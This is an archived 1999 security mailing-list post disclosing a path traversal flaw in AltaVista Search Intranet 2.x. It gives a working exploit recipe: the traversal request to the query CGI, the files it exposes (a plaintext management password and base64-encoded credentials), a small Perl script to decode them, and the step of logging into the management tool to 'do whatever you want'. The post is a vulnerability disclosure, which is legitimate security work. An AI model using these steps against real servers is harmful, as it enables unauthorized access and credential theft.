|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
AltaVista
Subject: AltaVista
From: rudi carell (rudicarell
HOTMAIL.COM)
Date: Wed Dec 29 1999 - 08:52:46 CST
- Next message: Henrik Edlund: "Re: majordomo local exploit"
- Previous message: Taneli Huuskonen: "Re: majordomo local exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
good morning folks,
... "With AltaVista Search Software, you can create your own search and
retrieval Web site with the same relevancy, performance, and efficiency of
the powerful AltaVista Search engine (www.altavista.com) used to index the
World Wide Web" ...
yes thats true .. but,
if you take a closer look on its functionallity and file-scructure you will
find some interesting things:
the template-variable: {mss} in the main search function (cgi-bin/query?)
allows you one traversal step back and
shows you any file in the "http - directory".
example: http://we.loverudi.org:9000/cgi-bin/query?../config
if you try to go more then one directory back the program escapes {mss} with
"../" ...
nice try .. but much to late .. the http directory contains some very
interesting files:
../config ( Var "MGMT_PW=[ Plaintext MGMT-password ]" )
../logs/mgtstate ( passw=[ encoded mgt-password ] .. NOT the
MGMT-password !!!)
../logs/stats.log ( sometimes stats_log )
../logs/access.log ( sometimes access_log )
forget everything but the "mgtstate" file .. it contains the
username:password
for the online-config tool ( http://we.loverudi.org:9000/cgi-bin/mgt ) in
the form:
passw=[ encoded user:password string ]
pfft .. these guys are really smart .. the encode their passwords ... (
base64 :)
now we need a prg/script to decode the user/password - string
---cut here---
#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";
---cut here---
thank you ...
then start(goto) the online config tool (
http://we.loverudi.org:9000/cgi-bin/mgt )
and do whatever you want ... aso aso aso
have a nice Y2K-BUG
rudicarellhotmail.com
other infos:
vulnerable: altavista search intranet 2.??
type: Input Validation Error
object: query?
remote: yes
vendor: altavista .. got informed ~3 month ago)
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
- Next message: Henrik Edlund: "Re: majordomo local exploit"
- Previous message: Taneli Huuskonen: "Re: majordomo local exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b27 : Wed Dec 29 1999 - 19:38:03 CST